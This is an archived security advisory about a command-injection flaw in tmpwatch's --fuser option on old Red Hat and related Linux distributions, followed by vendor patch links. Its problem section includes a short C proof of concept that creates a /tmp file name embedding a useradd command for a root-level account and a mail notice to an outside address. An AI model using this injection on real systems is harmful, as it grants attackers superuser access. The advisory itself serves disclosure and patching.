COMMAND

    tmpwatch

SYSTEMS AFFECTED

    tmpwatch 2.2, 2.5.1

PROBLEM

    Following  is  based  on  a  Internet  Security  Systems  Security
    Advisory.  The tmpwatch utility is used in Red Hat Linux to remove
    temporary files.  This utility  has an option to call  the "fuser"
    program,  which  verifies  if  a  file  is  currently  opened by a
    process.  The fuser program is invoked within tmpwatch by  calling
    the  system()  library  subroutine.   Insecure  handling  of   the
    arguments to this subroutine  could potentially allow an  attacker
    to execute arbitrary commands.

    This  vulnerability  may  allow  local  attackers  to   compromise
    superuser access  if tmpwatch  is used  by the  administrator in a
    non-default manner.

    Affected versions:

        Red Hat Linux 7.0 (tmpwatch v2.5.1)
        Red Hat Linux 6.2 (tmpwatch v2.2)

    Use  the  'rpm  -q  tmpwatch'  command  to verify which version is
    installed.  The tmpwatch package as well as the package containing
    fuser are included in the default base installation.  By  default,
    tmpwatch with the fuser option is not used in any package  shipped
    with the Red Hat distributions.

    The tmpwatch  tool removes  files that  have not  been modified or
    accessed within a  specified amount of  time.  It  was designed to
    securely  remove   files  by   avoiding  typical   race  condition
    vulnerabilities.   System  administrators  usually  run  this tool
    periodically  to  remove  old  temporary  files in world-writeable
    directories.

    The tmpwatch tool uses the --fuser or -s options to avoid removing
    a file that is in an  open state in another process.   This option
    uses the system() library subroutine to call the external  program
    /sbin/fuser with the file name being examined as an argument.  The
    system() subroutine  spawns a  shell to  execute the  command.  An
    attacker may create a  file name containing shell  metacharacters,
    which could allow them  to execute arbitrary commands  if tmpwatch
    with the fuser option is used to remove the file.

    Source  code  comparison  between  the  Red  Hat Linux 6.2 and 7.0
    tmpwatch packages suggests  this vulnerability was  recognized and
    a  fix  was  attempted.   However,  the  fix is incorrect, and the
    vulnerability is still exploitable.

    Here is a  simple example of  Alexander Y. Yurchenko  playing with
    tmpwatch bug:

    1. Execute following in /tmp

    #include <stdio.h>
    
    int main()
    {
       FILE *f;
       char filename[100] = ";useradd -u 0 -g 0 haks0r;mail
    haks0r@somehost.com<blablabla";
    
       if((f = fopen(filename, "a")) == 0) {
          perror("Could not create file");
          exit(1);
       }
       close(f);
    }

    2. cp /usr/sbin/adduser /tmp
    3. Just wait for mail

SOLUTION

    Do not use the --fuser or  -s options with tmpwatch.  Red  Hat has
    issued  the   following  RPMs   that  contain   fixes  for    this
    vulnerability:

        ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm
        ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm
        ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm
        ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm
        ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm
        ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm

    For ImmunixOS:

        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm

    For Linux-Mandrake:

        Linux-Mandrake 6.0: 6.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
                            6.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
        Linux-Mandrake 6.1: 6.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
                            6.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
        Linux-Mandrake 7.0: 7.0/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
                            7.0/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm
        Linux-Mandrake 7.1: 7.1/RPMS/tmpwatch-2.6.2-1mdk.i586.rpm
                            7.1/SRPMS/tmpwatch-2.6.2-1mdk.src.rpm

    For Conectiva Linux:

        ftp://atualizacoes.conectiva.com.br/4.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.0es/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/tmpwatch-2.6.2-1cl.src.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/tmpwatch-2.6.2-1cl.i386.rpm
        ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/tmpwatch-2.6.2-1cl.src.rpm

    The tmpwatch packages as  shipped with SuSE distributions  are not
    vulnerable  to  the  attacks  as  discussed  on  security  forums,
    initiated and discovered by zenith parsec.

    All users of TSL should upgrade to the new rpm:

        http://www.trustix.net/download/Trustix/updates/1.1/RPMS/tmpwatch-2.6.2-1tr.i586.rpm
        ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/tmpwatch-2.6.2-1tr.i586.rpm